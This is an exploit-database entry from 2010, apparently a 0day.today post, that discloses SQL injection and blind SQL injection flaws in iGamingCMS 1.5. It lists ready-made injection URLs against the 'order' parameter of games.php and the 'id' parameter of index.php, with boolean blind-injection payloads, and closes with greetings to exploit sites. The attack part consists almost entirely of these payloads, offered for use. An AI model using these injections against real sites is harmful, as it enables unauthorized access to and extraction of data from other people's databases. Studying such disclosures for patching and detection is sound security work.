iGamingCMS1.5 multiple vulnirabilities

2010-08-27T00:00:00
ID 1337DAY-ID-13889
Type zdt
Reporter Sweet
Modified 2010-08-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ======================================
iGamingCMS1.5 multiple vulnirabilities
======================================

############################################################################
#                                                                          #
# Exploit Title: iGamingCMS1.5 multiple vulnirabilities                    #
#                                                                          #
# Date: 27/08/2010                                                         #
#                                                                          #
# Author: Sweet                                                            #
#                                                                          #
# Contact : [email protected]                                            #
#                                                                          #
# Software Link: http://www.igamingcms.com/                                #
#                                                                          #
# Download: http://forums.igamingcms.com/forumdisplay.php?f=5              #
#                                                                          #
# Version:1.5                                                              #
#                                                                          #
# Tested on: WinXp sp3                                                     #
#                                                                          #
# Risk : hight                                                             #
#                                                                          #
#                                                                          #
# Description : iGaming CMS is a content management                        #
#         system designed for gaming websites.                             #
#                                                                          #
#                                                                          #
#                                                                          #
############################################################################
 
1-SQL injection:
 
http://www.example.com/igamingpath/games.php?order=1[SQLi]&[email protected]&sort=desc
 
2-Blind injection:
 
http://www.example.com/igamingpath/games.php?order=title&[email protected]'+and+31337-31337='0&sort=desc
 
http://www.example.com/igamingpath/index.php?do=viewarticle&id=1'+and+31337-31337='0
 
 
thx to Milw0rm.com , JF - Hamst0r - Keystroke  , inj3ct0r.com , exploit-db.com
 
Saha Ftourkoum et 1,2,3 viva L'Algerie :))



#  0day.today [2018-01-05]  #